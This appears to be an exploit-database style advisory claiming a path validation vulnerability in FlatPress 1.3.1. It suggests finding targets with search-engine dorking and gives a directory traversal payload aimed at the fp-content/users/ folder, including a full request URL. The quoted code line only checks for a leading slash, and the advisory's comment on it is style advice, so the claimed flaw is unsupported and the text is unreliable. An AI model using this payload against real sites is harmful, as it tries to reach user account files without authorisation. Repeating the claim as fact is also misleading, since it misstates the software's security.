============================================================================================================================================= | # Title : FlatPress 1.3.1 Path Validation Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://github.com/flatpressblog/flatpress/archive/1.3.1.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] infected item : /flatpress-1.3.1/fp-includes/core/core.config.php if ($fullpath[0] != '/') trigger_error('config_read: syntax error. Path must begin with a /'); [+] This line checks if the path starts with /. If it doesn’t, it triggers an error using trigger_error. While this is valid, it might be better to use an InvalidArgumentException for more robust error handling. [+] use payload : /fp-includes/core/core.config.php/path=../../../../../fp-content/users/ [+] http://127.0.0.1/flatpress-1.3.1/fp-includes/core/core.config.php/path=../../../../../fp-content/users/ Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ==========================================================================